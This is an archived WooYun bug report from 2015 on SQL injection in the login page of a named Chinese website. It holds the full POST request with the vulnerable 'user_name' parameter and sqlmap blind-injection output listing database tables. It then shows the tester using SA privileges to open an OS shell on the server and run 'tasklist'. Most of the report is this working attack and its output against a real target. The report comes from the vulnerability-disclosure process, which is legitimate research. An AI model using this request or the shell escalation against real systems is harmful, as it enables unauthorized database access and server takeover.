乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-22: 细节已通知厂商并且等待厂商处理中 2015-08-25: 厂商已经确认,细节仅向厂商公开 2015-09-04: 细节向核心白帽子及相关领域专家公开 2015-09-14: 细节向普通白帽子公开 2015-09-24: 细节向实习白帽子公开 2015-10-09: 细节向公众公开
主站注入
POST /WebSiteMaintain2014/checkLogOn.do HTTP/1.1Host: www.scti.cnContent-Length: 313Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.scti.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.scti.cn/WebSiteMaintain2014/checkLogOn.doAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=fdmpac45jalcwc55x1eo4h55__VIEWSTATE=%2FwEPDwUJODAxNjkyMzMwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUHQnV0dG9uMgUYcmVtZW1iZXJVc2VyTmFtZUNoZWNrQm94MWP2irUu6DSaU60Ombou6nrvC%2Bc%3D&__EVENTVALIDATION=%2FwEWBQKXspW9DwL9lveNCgLyveCRDwK7q7GGCAKxlvb0BVFfM467wXsnDsVZkemwGxMBVR%2B7&user_name=admin&password=admin&Button2.x=23&Button2.y=8
'user_name' is vulnerable
[13:54:41] [INFO] adjusting time delay to 3 seconds due to good response times0[13:54:42] [INFO] retrieved: dbo.dtproperties[13:59:01] [INFO] retrieved: dbo.sqlmapoutput[14:02:34] [INFO] retrieved: dbo.sysconstraints[14:06:11] [INFO] retrieved: dbo.syssegments[14:08:40] [INFO] retrieved: dbo.v_dm_location[14:12:25] [INFO] retrieved: dbo.v_getdate[14:14:27] [INFO] retrieved: dbo.v_xt_dept[14:16:55] [INFO] retrieved: dbo.v_xt_organise[14:19:30] [INFO] retrieved: dbo.v_xt_t_user[14:21:41] [INFO] retrieved: dbo.ww_attached_prope[14:27:29] [ERROR] invalid character detected. retrying..[14:27:29] [WARNING] increasing time delay to 4 secondsrty_group[14:30:53] [INFO] retrieved: dbo.ww_attached_property_set[14:33:44] [INFO] retrieved: dbo.ww_attached_property_value[14:37:10] [INFO] retrieved: dbo.ww_base_info[14:40:35] [INFO] retrieved: dbo.ww_contentA[14:43:46] [INFO] retrieved: dbo.ww_content_[14:45:34] [ERROR] invalid character detected. retrying..[14:45:34] [WARNING] increasing time delay to 5 secondsadjunct[14:48:19] [INFO] retrieved: dbo.ww_friend_website[14:54:20] [INFO] retrieved: dbo.ww_invite_adjunct[15:00:35] [INFO] retrieved: dbo.ww_invite_[15:02:22] [ERROR] invalid character detected. retrying..[15:02:22] [WARNING] increasing time delay to 6 secondscont[15:05:05] [ERROR] invalid character detected. retrying..[15:05:05] [WARNING] increasing time delay to 7 secondsent[15:06:59] [ERROR] invalid character detected. retrying..[15:06:59] [WARNING] increasing time delay to 8 seconds[15:07:08] [INFO] retrieved: dbo.ww_mod
SA权限直接cmd_shell
os-shell> tasklist /svcdo you want to retrieve the command standard output? [Y/n/a] y[15:44:34] [INFO] retrieved:[15:44:42] [ERROR] invalid character detected. retrying..[15:44:42] [WARNING] increasing time delay to 2 seconds68[15:44:58] [INFO] retrieved:[15:45:13] [INFO] retrieved:[15:46:13] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.????[15:50:02] [ERROR] invalid character detected. retrying..[15:50:02] [WARNING] increasing time delay to 3 seconds[15:52:23] [INFO] retrieved: ========================= ======== ====[16:02:36] [ERROR] invalid character detected. retrying..[16:02:36] [WARNING] increasing time delay to 4 seconds=======================[16:10:16] [ERROR] invalid character detected. retrying..[16:10:16] [WARNING] increasing time delay to 5 seconds==========[16:14:35] [ERROR] invalid character detected. retrying..[16:14:35] [WARNING] increasing time delay to 6 seconds===[16:16:06] [ERROR] unable to properly validate last character value ('a')..a[16:16:17] [ERROR] invalid character detected. retrying..[16:16:17] [WARNING] increasing time delay to 2 seconds==[16:16:45] [ERROR] invalid character detected. retrying..[16:16:45] [WARNING] increasing time delay to 3 seconds= A[16:17:19] [INFO] retrieved:[16:17:33] [ERROR] invalid character detected. retrying..[16:17:33] [WARNING] increasing time delay to 4 secondsSyst[16:19:08] [ERROR] invalid character detected. retrying..[16:19:08] [WARNING] increasing time delay to 5 secondse[16:19:56] [ERROR] invalid character detected. retrying..[16:19:56] [WARNING] increasing time delay to 6 seconds[16:20:24] [ERROR] unable to properly validate last character value ('m')..m[16:20:31] [ERROR] invalid character detected. retrying..[16:20:31] [WARNING] increasing time delay to 2 seconds Idle Proces[16:23:09] [ERROR] invalid character detected. retrying..[16:23:09] [WARNING] increasing time delay to 3 seconds[16:23:30] [ERROR] invalid character detected. retrying..[16:23:30] [WARNING] increasing time delay to 4 seconds[16:23:50] [ERROR] invalid character detected. retrying..[16:23:50] [WARNING] increasing time delay to 5 secondss[16:24:23] [ERROR] invalid character detected. retrying..[16:24:23] [WARNING] increasing time delay to 6 seconds[16:26:35] [ERROR] unable to properly validate last character value (' ')..[16:26:39] [ERROR] invalid character detected. retrying..[16:26:39] [WARNING] increasing time delay to 2 seconds[16:27:00] [ERROR] invalid character detected. retrying..[16:27:00] [WARNING] increasing time delay to 3 seconds[16:27:27] [ERROR] invalid character detected. retrying..[16:27:27] [WARNING] increasing time delay to 4 seconds[16:28:38] [ERROR] invalid character detected. retrying..[16:28:38] [WARNING] increasing time delay to 5 seconds[16:29:34] [INFO] retrieved: S[16:30:24] [ERROR] invalid character detected. retrying..[16:30:24] [WARNING] increasing time delay to 6 secondsy[16:31:19] [ERROR] unable to properly validate last character value ('{')..{tem[16:33:02] [INFO] retrieved: sms[16:33:29] [ERROR] invalid character detected. retrying..[16:33:29] [WARNING] increasing time delay to 2 seconds[16:33:41] [ERROR] invalid character detected. retrying..[16:33:41] [WARNING] increasing time delay to 3 secondss[16:34:02] [ERROR] invalid character detected. retrying..[16:34:02] [WARNING] increasing time delay to 4 seconds.exe[16:39:03] [INFO] retrieved: csr[16:40:20] [ERROR] invalid character detected. retrying..[16:40:20] [WARNING] increasing time delay to 5 secondss[16:41:09] [ERROR] invalid character detected. retrying..[16:41:09] [WARNING] increasing time delay to 6 secondss.exe[16:47:22] [ERROR] unable to properly validate last character value ('A')..A[16:48:42] [INFO] retrieved: winlogon.exe[16:51:23] [INFO] retrieved: servi[16:52:04] [ERROR] invalid character detected. retrying..[16:52:04] [WARNING] increasing time delay to 2 secondsc[16:52:23] [ERROR] invalid character detected. retrying..[16:52:23] [WARNING] increasing time delay to 3 secondses.exe[16:56:45] [INFO] retrieved: lsass.exe[17:01:20] [ERROR] invalid character detected. retrying..[17:01:20] [WARNING] increasing time delay to 4 seconds[17:02:05] [INFO] retrieved:[17:06:13] [INFO] retrieved: svchost[17:08:57] [ERROR] invalid character detected. retrying..[17:08:57] [WARNING] increasing time delay to 5 seconds.exe[17:15:06] [INFO] retrieved:[17:15:32] [ERROR] invalid character detected. retrying..[17:15:32] [WARNING] increasing time delay to 6 secondssvcho[17:18:27] [ERROR] unable to properly validate last character value ('u')..ut.exe[17:20:19] [INFO] retrieved: s[17:20:36] [ERROR] invalid character detected. retrying..[17:20:36] [WARNING] increasing time delay to 2 secondsvchost.exe[17:24:31] [INFO] retrieved: svchost.ex[17:26:34] [ERROR] invalid character detected. retrying..[17:26:34] [WARNING] increasing time delay to 3 secondse[17:28:34] [ERROR] invalid character detected. retrying..[17:28:34] [WARNING] increasing time delay to 4 seconds[17:28:41] [ERROR] invalid character detected. retrying..[17:28:41] [WARNING] increasing time delay to 5 seconds
*****终止了,不知道^*****
危害等级:中
漏洞Rank:10
确认时间:2015-08-25 09:05
公司正在进行公司主站网站的升级工作。
暂无